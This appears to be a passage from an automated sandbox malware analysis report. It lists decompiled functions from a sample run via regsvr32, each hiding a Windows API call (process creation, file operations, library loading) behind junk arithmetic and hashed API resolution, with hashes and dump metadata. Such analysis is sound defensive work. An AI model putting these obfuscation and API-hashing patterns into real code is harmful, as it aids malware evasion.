                                                                                                                • Instruction Fuzzy Hash: E6116AB1D0124CFFDB08DFE9E94AA9EBBB1EB40304F208199E814B7290D7B65B548F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0031ED7B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 555 31ed7b-31ee13 call 30c98a call 307f78 CloseServiceHandle
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0031ED7B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t33;
				int _t43;
				signed int _t45;
				signed int _t46;
				void* _t53;

				_push(_a8);
				_t53 = __ecx;
				_push(_a4);
				_push(__ecx);
				E0030C98A(_t33);
				_v16 = 0xcf28aa;
				_v16 = _v16 + 0xffff6a13;
				_v16 = _v16 ^ 0x00c8c4e4;
				_v12 = 0x49ff01;
				_t45 = 0xb;
				_v12 = _v12 / _t45;
				_t46 = 0x5d;
				_v12 = _v12 / _t46;
				_v12 = _v12 ^ 0x00001054;
				_v8 = 0x2a1e4a;
				_v8 = _v8 | 0x32e5c17e;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00072801;
				E00307F78(_t46, 0x616ae4, _t46, 0x1ec, _t46, 0x378734d);
				_t43 = CloseServiceHandle(_t53); // executed
				return _t43;
			}











                                                                                                                0x0031ed82
                                                                                                                0x0031ed85
                                                                                                                0x0031ed87
                                                                                                                0x0031ed8b
                                                                                                                0x0031ed8c
                                                                                                                0x0031ed91
                                                                                                                0x0031ed9b
                                                                                                                0x0031eda4
                                                                                                                0x0031edab
                                                                                                                0x0031edb7
                                                                                                                0x0031edbc
                                                                                                                0x0031edc4
                                                                                                                0x0031edcc
                                                                                                                0x0031edd4
                                                                                                                0x0031eddb
                                                                                                                0x0031ede2
                                                                                                                0x0031ede9
                                                                                                                0x0031eded
                                                                                                                0x0031ee04
                                                                                                                0x0031ee0d
                                                                                                                0x0031ee13

                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0031EE0D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 1725840886-1100367487
                                                                                                                • Opcode ID: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction ID: d2e427de289d1fffecdef91e7b20bfe9cb9d2f17ea3b80ee736f090a5f63fdfa
                                                                                                                • Opcode Fuzzy Hash: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction Fuzzy Hash: 39015B71D01208BFDB08DFA4C94A8DEBFB5EF45314F10C08AE914AB241E7B25B558F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00304A9D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00304A9D(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t32;
				struct HINSTANCE__* _t39;
				WCHAR* _t43;

				_push(_a8);
				_t43 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0030C98A(_t32);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0x1178a2;
				_v16 = 0x17846b;
				_v16 = _v16 | 0x3185073b;
				_v16 = _v16 + 0xffff538e;
				_v16 = _v16 ^ 0x3197b69f;
				_v12 = 0x16ba99;
				_v12 = _v12 ^ 0x02625a09;
				_v12 = _v12 ^ 0x25365766;
				_v12 = _v12 ^ 0x27431ab3;
				_v8 = 0xb183e3;
				_v8 = _v8 * 0x28;
				_v8 = _v8 | 0x77f20d23;
				_v8 = _v8 ^ 0x7ff151f0;
				E00307F78(__ecx, 0xbd3f148a, __ecx, 0x32, __ecx, 0xc1451b2a);
				_t39 = LoadLibraryW(_t43); // executed
				return _t39;
			}












                                                                                                                0x00304aa4
                                                                                                                0x00304aa7
                                                                                                                0x00304aa9
                                                                                                                0x00304aac
                                                                                                                0x00304aad
                                                                                                                0x00304aae
                                                                                                                0x00304ab3
                                                                                                                0x00304aba
                                                                                                                0x00304ac3
                                                                                                                0x00304aca
                                                                                                                0x00304ad1
                                                                                                                0x00304ad8
                                                                                                                0x00304adf
                                                                                                                0x00304ae6
                                                                                                                0x00304aed
                                                                                                                0x00304af4
                                                                                                                0x00304afb
                                                                                                                0x00304b02
                                                                                                                0x00304b16
                                                                                                                0x00304b19
                                                                                                                0x00304b20
                                                                                                                0x00304b30
                                                                                                                0x00304b39
                                                                                                                0x00304b3f

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: fW6%
                                                                                                                • API String ID: 1029625771-2497841860
                                                                                                                • Opcode ID: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction ID: 0e203ecac6e208201295f7157f811463872383ef11cb86b358fa403ce426dc52
                                                                                                                • Opcode Fuzzy Hash: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction Fuzzy Hash: A9111871C11208FFDB08DFA5DA469DEBBB4FB00315F60C189E415B6251D3715B549F94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00317B25 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00317B25() {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _t31;

				_v16 = 0x340970;
				_t2 =  &_v16; // 0x340970
				_t31 = 0x26;
				_v16 =  *_t2 / _t31;
				_v16 = _v16 ^ 0x000e30ec;
				_v8 = 0x85299d;
				_v8 = _v8 + 0xa54a;
				_v8 = _v8 ^ 0x35a74c3e;
				_v8 = _v8 ^ 0x3521895a;
				_v12 = 0xcc7db5;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x000f948d;
				E00307F78(_t31, 0xbd3f148a, _t31, 0x108, _t31, 0xac0441b9);
				ExitProcess(0);
			}







                                                                                                                0x00317b2b
                                                                                                                0x00317b34
                                                                                                                0x00317b39
                                                                                                                0x00317b41
                                                                                                                0x00317b49
                                                                                                                0x00317b50
                                                                                                                0x00317b57
                                                                                                                0x00317b5e
                                                                                                                0x00317b65
                                                                                                                0x00317b6c
                                                                                                                0x00317b73
                                                                                                                0x00317b77
                                                                                                                0x00317b8e
                                                                                                                0x00317b98

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 00317B98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID: p4
                                                                                                                • API String ID: 621844428-1539767998
                                                                                                                • Opcode ID: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction ID: 45b6078ec12461d3bb8efde00d71fccc3f154a77b4a80ba1a02d77decd17f008
                                                                                                                • Opcode Fuzzy Hash: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction Fuzzy Hash: BBF08C71E0130CFBDB44DBE5D94AA9EBBF0EB50304F20C088D915A7241D7B56B088F41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0031A50A Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E0031A50A(void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a24, long _a28, intOrPtr _a36, long _a40, intOrPtr _a44, WCHAR* _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t54;
				void* _t65;
				signed int _t66;
				signed int _t67;

				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E0030C98A(_t54);
				_v28 = 0xdc14f8;
				_v24 = 0xd964fd;
				_v20 = 0;
				_v16 = 0xcfd091;
				_v16 = _v16 << 0x10;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0x910ec0c9;
				_v12 = 0x7a2ff2;
				_t66 = 0x43;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xd721c1d7;
				_v12 = _v12 ^ 0xd727192a;
				_v8 = 0x1eb7c0;
				_v8 = _v8 ^ 0x33199484;
				_t67 = 0x2d;
				_v8 = _v8 * 0xa;
				_v8 = _v8 / _t67;
				_v8 = _v8 ^ 0x05a21ecf;
				E00307F78(_t67, 0xbd3f148a, _t67, 0x203, _t67, 0x939ae237);
				_t65 = CreateFileW(_a48, _a28, _a40, 0, _a4, _a16, 0); // executed
				return _t65;
			}













                                                                                                                0x0031a511
                                                                                                                0x0031a516
                                                                                                                0x0031a519
                                                                                                                0x0031a51c
                                                                                                                0x0031a51f
                                                                                                                0x0031a520
                                                                                                                0x0031a523
                                                                                                                0x0031a526
                                                                                                                0x0031a529
                                                                                                                0x0031a52c
                                                                                                                0x0031a52f
                                                                                                                0x0031a532
                                                                                                                0x0031a536
                                                                                                                0x0031a537
                                                                                                                0x0031a53c
                                                                                                                0x0031a546
                                                                                                                0x0031a54f
                                                                                                                0x0031a552
                                                                                                                0x0031a559
                                                                                                                0x0031a55d
                                                                                                                0x0031a561
                                                                                                                0x0031a568
                                                                                                                0x0031a574
                                                                                                                0x0031a579
                                                                                                                0x0031a57e
                                                                                                                0x0031a585
                                                                                                                0x0031a58c
                                                                                                                0x0031a593
                                                                                                                0x0031a59e
                                                                                                                0x0031a5aa
                                                                                                                0x0031a5b3
                                                                                                                0x0031a5bb
                                                                                                                0x0031a5cb
                                                                                                                0x0031a5e4
                                                                                                                0x0031a5ea

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,D727192A,00D964FD,00000000), ref: 0031A5E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction ID: 6c5aeb19629d37ba9cd9c85beff13fd73e2ad82337c492e339406215e5c4f4b2
                                                                                                                • Opcode Fuzzy Hash: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction Fuzzy Hash: 0E21E372901108FBDF05CFE9C94A8DEBFB6EF48314F108149FA1866260D3728A60EF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0030816B Relevance: 1.6, APIs: 1, Instructions: 68processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 39%
                                                                                                                			E0030816B(struct _STARTUPINFOW* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, WCHAR* _a40, intOrPtr _a48, intOrPtr _a52, struct _PROCESS_INFORMATION* _a56, WCHAR* _a60, int _a64) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t45;
				int _t52;
				struct _STARTUPINFOW* _t56;

				_push(_a64);
				_t56 = __ecx;
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E0030C98A(_t45);
				_v12 = 0x5160ce;
				_v12 = _v12 ^ 0x33bed16b;
				_v12 = _v12 + 0xffffe3b5;
				_v12 = _v12 | 0x3554987c;
				_v12 = _v12 ^ 0x37f1882e;
				_v8 = 0x57d154;
				_v8 = _v8 + 0xffff861a;
				_v8 = _v8 * 0x3e;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x0012f1da;
				_v16 = 0x81ccd1;
				_v16 = _v16 >> 4;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x000c22df;
				E00307F78(__ecx, 0xbd3f148a, __ecx, 0x245, __ecx, 0x989b5ecc);
				_t52 = CreateProcessW(_a40, _a60, 0, 0, _a64, 0, 0, 0, _t56, _a56); // executed
				return _t52;
			}









                                                                                                                0x00308173
                                                                                                                0x00308178
                                                                                                                0x0030817a
                                                                                                                0x0030817d
                                                                                                                0x00308180
                                                                                                                0x00308183
                                                                                                                0x00308186
                                                                                                                0x00308187
                                                                                                                0x0030818a
                                                                                                                0x0030818b
                                                                                                                0x0030818e
                                                                                                                0x0030818f
                                                                                                                0x00308192
                                                                                                                0x00308195
                                                                                                                0x00308196
                                                                                                                0x00308199
                                                                                                                0x0030819c
                                                                                                                0x0030819f
                                                                                                                0x003081a0
                                                                                                                0x003081a1
                                                                                                                0x003081a6
                                                                                                                0x003081b0
                                                                                                                0x003081bc
                                                                                                                0x003081c3
                                                                                                                0x003081ca
                                                                                                                0x003081d1
                                                                                                                0x003081d8
                                                                                                                0x003081ef
                                                                                                                0x003081f2
                                                                                                                0x003081f6
                                                                                                                0x003081fd
                                                                                                                0x00308204
                                                                                                                0x00308208
                                                                                                                0x0030820c
                                                                                                                0x0030821c
                                                                                                                0x00308236
                                                                                                                0x0030823d

                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,00000044,?), ref: 00308236
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction ID: efa2a3d7c9a77284937e32d08bdd54c445663cb2de6f8ec1893e35124564aa91
                                                                                                                • Opcode Fuzzy Hash: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction Fuzzy Hash: E421C372801248BBCF169F95CD09CCFBFB9EB89714F108098FA1562161D3729A65EB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00303466 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00303466(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t29;
				intOrPtr* _t35;
				void* _t36;
				void* _t41;

				_t41 = __ecx;
				E0030C98A(_t29);
				_v8 = 0x88f6ec;
				_v8 = _v8 | 0x6177bf25;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 + 0x167f;
				_v8 = _v8 ^ 0x0004f919;
				_v16 = 0x9ca171;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x0005b7ae;
				_v12 = 0xf5b080;
				_v12 = _v12 * 0x58;
				_v12 = _v12 ^ 0x54793a02;
				_t35 = E00307F78(__ecx, 0xffc5979d, __ecx, 0xcc, __ecx, 0x31e1b46b);
				_t36 =  *_t35(0, _t41, 0, 0, _a12, __ecx, __edx, 0, 0, _a12, _a16, 0, _a24, _a28, _a32); // executed
				return _t36;
			}










                                                                                                                0x00303473
                                                                                                                0x00303486
                                                                                                                0x0030348b
                                                                                                                0x00303495
                                                                                                                0x003034a1
                                                                                                                0x003034a5
                                                                                                                0x003034ac
                                                                                                                0x003034b3
                                                                                                                0x003034ba
                                                                                                                0x003034be
                                                                                                                0x003034c5
                                                                                                                0x003034dc
                                                                                                                0x003034df
                                                                                                                0x003034ef
                                                                                                                0x003034fe
                                                                                                                0x00303505

                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 003034FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction ID: 995cd6da1270c1f8d8d89b51b3caa9e6bae1c1e9ae6a8b1fd533e096e879b5e9
                                                                                                                • Opcode Fuzzy Hash: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction Fuzzy Hash: F2113671801248BBCB11DFA6DD0ACDFBFB8EB85704F108099F914A2250D3715B24DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0031EAB3 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0031EAB3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t35;
				intOrPtr* _t40;
				void* _t41;

				E0030C98A(_t35);
				_v28 = 0xe6c580;
				_v24 = 0;
				_v20 = 0;
				_v8 = 0x2d161b;
				_v8 = _v8 + 0xffffdf88;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 | 0xc1e5ff2b;
				_v8 = _v8 ^ 0xc1e88dee;
				_v16 = 0xd78d92;
				_v16 = _v16 ^ 0xcf4c3c1d;
				_v16 = _v16 ^ 0xcf92c072;
				_v12 = 0x4f9c9d;
				_v12 = _v12 >> 4;
				_v12 = _v12 + 0xffff6ea2;
				_v12 = _v12 ^ 0x00061ead;
				_t40 = E00307F78(__ecx, 0xbd3f148a, __ecx, 0x47, __ecx, 0x6e03cec5);
				_t41 =  *_t40(_a16, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
				return _t41;
			}












                                                                                                                0x0031eacf
                                                                                                                0x0031ead4
                                                                                                                0x0031eade
                                                                                                                0x0031eae6
                                                                                                                0x0031eae9
                                                                                                                0x0031eaf0
                                                                                                                0x0031eaf7
                                                                                                                0x0031eafb
                                                                                                                0x0031eb02
                                                                                                                0x0031eb09
                                                                                                                0x0031eb10
                                                                                                                0x0031eb17
                                                                                                                0x0031eb1e
                                                                                                                0x0031eb25
                                                                                                                0x0031eb29
                                                                                                                0x0031eb30
                                                                                                                0x0031eb49
                                                                                                                0x0031eb5a
                                                                                                                0x0031eb60

                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(000B5C15,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,?,00000023), ref: 0031EB5A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction ID: 84070c328c0793c19900b93b3b667d47c65617a591a678b41fba72aa009af588
                                                                                                                • Opcode Fuzzy Hash: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction Fuzzy Hash: 6B110476C02219BBCF11DFA4990A9EEBF74EB44314F108189E914A6294D3B14A64AFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00317DA0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00317DA0(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t34;
				int _t44;
				signed int _t46;
				signed int _t47;
				struct _SHFILEOPSTRUCTW* _t54;

				_push(_a4);
				_t54 = __edx;
				_push(__edx);
				E0030C98A(_t34);
				_v12 = 0xcdb49a;
				_v12 = _v12 + 0x8f05;
				_v12 = _v12 + 0xffff9965;
				_v12 = _v12 ^ 0x00c100f7;
				_v16 = 0xfe6a9a;
				_v16 = _v16 + 0xffff1466;
				_v16 = _v16 ^ 0x00fd95e9;
				_v8 = 0xca762f;
				_v8 = _v8 << 0xe;
				_t46 = 0x7f;
				_v8 = _v8 / _t46;
				_t47 = 0x2e;
				_v8 = _v8 / _t47;
				_v8 = _v8 ^ 0x00082e4e;
				E00307F78(_t47, 0xffc5979d, _t47, 0xab, _t47, 0x3ddf729);
				_t44 = SHFileOperationW(_t54); // executed
				return _t44;
			}











                                                                                                                0x00317da7
                                                                                                                0x00317daa
                                                                                                                0x00317dac
                                                                                                                0x00317dae
                                                                                                                0x00317db3
                                                                                                                0x00317dbd
                                                                                                                0x00317dc6
                                                                                                                0x00317dcd
                                                                                                                0x00317dd4
                                                                                                                0x00317ddb
                                                                                                                0x00317de2
                                                                                                                0x00317de9
                                                                                                                0x00317df0
                                                                                                                0x00317df9
                                                                                                                0x00317dfe
                                                                                                                0x00317e06
                                                                                                                0x00317e0e
                                                                                                                0x00317e16
                                                                                                                0x00317e2d
                                                                                                                0x00317e36
                                                                                                                0x00317e3c

                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 00317E36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3080627654-0
                                                                                                                • Opcode ID: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction ID: 929579d9812b60fc1061e82f8d3edfd637921ffe53792c9df39ce6e051e60194
                                                                                                                • Opcode Fuzzy Hash: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction Fuzzy Hash: 31118BB1D01208FFDB14DFA9D80A8DEBBB5EB45314F20C19AE418A7281E7B55F149F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00303506 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E00303506(void* __ecx, void* __edx, void* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t39;
				void* _t47;
				signed int _t49;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0030C98A(_t39);
				_v16 = 0xf4e2fc;
				_t49 = 0x3b;
				_v16 = _v16 / _t49;
				_v16 = _v16 ^ 0x00083f87;
				_v12 = 0x549d10;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0xffff8515;
				_v12 = _v12 | 0x9f85c2ad;
				_v12 = _v12 ^ 0x9fa0e66d;
				_v8 = 0xbeaf63;
				_v8 = _v8 | 0x7acbe5f7;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x3b62dfe8;
				_v8 = _v8 ^ 0xcc9b72fd;
				E00307F78(_t49, 0xbd3f148a, _t49, 0x106, _t49, 0xba07f621);
				_t47 = RtlAllocateHeap(_a4, _a16, _a8); // executed
				return _t47;
			}









                                                                                                                0x0030350c
                                                                                                                0x0030350f
                                                                                                                0x00303512
                                                                                                                0x00303515
                                                                                                                0x00303518
                                                                                                                0x0030351d
                                                                                                                0x00303522
                                                                                                                0x00303533
                                                                                                                0x0030353b
                                                                                                                0x00303543
                                                                                                                0x0030354a
                                                                                                                0x00303551
                                                                                                                0x00303555
                                                                                                                0x0030355c
                                                                                                                0x00303563
                                                                                                                0x0030356a
                                                                                                                0x00303571
                                                                                                                0x00303578
                                                                                                                0x0030357c
                                                                                                                0x00303583
                                                                                                                0x0030359a
                                                                                                                0x003035ab
                                                                                                                0x003035b0

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(9FA0E66D,?,00083F87), ref: 003035AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
